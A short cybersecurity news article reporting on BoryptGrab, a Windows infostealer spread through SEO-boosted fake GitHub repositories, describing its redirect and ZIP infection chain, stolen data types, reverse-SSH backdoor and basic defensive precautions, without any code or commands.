A newly identified malware known as BoryptGrab is rapidly spreading across Windows platforms. It utilizes fake GitHub repositories to deceive users into downloading what seem to be popular free software tools.
How BoryptGrab Operates
The campaign, active since April 2025, cleverly manipulates search engines to present these malicious repositories as legitimate, leading users into an intricate infection chain. This process ultimately results in the theft of sensitive information, which is covertly sent to the attackers.
A significant number of GitHub repositories have been established by the threat actors, each posing as a download page for various tools, including game cheats and productivity applications. These repositories use SEO-optimized keywords to rank highly in search results, appearing alongside authentic results.
Uncovering the Infection Chain
Upon clicking download links in these repositories, users undergo multiple redirections, involving base64-encoded and AES-encrypted URLs, before landing on a deceptive download page that distributes a malicious ZIP file. Trend Micro analysts traced the BoryptGrab campaign while investigating suspicious ZIP files, linking the infection chain back to these GitHub-hosted pages.
The research revealed a complex operation involving various payload variants, tagged with build names like “Shrek” and “CryptoByte.” This indicates a well-organized and ongoing threat. BoryptGrab is capable of extracting credentials and cookies from popular browsers like Chrome and Firefox, and targets over 30 cryptocurrency wallet applications, including Exodus and Ledger Live.
Potential Threats and Precautions
A notable aspect of this campaign is the inclusion of TunnesshClient, a backdoor that establishes a reverse SSH tunnel to the attacker’s server, allowing remote command execution and file transfer. Russian-language comments in the code and IP addresses linked to Russia suggest the origin of the attackers.
The infection starts when a victim downloads a ZIP file from these fake GitHub pages, leading to a page that redirects and serves a malicious ZIP file based on the victim’s visit. The payload within the ZIP can take various forms, including executables that decrypt embedded payloads or VBS scripts that use obfuscated PowerShell commands.
To minimize risk, users should download software only from verified sources and avoid free tools from unfamiliar GitHub repositories. Security teams should monitor for suspicious activities such as unexpected scheduled tasks and unusual outbound traffic. Keeping security tools up-to-date and verifying software sources are vital steps in reducing exposure to such threats.
Stay updated with the latest cybersecurity news by following us on Google News, LinkedIn, and X. Set CSN as your go-to source on Google for instant updates.
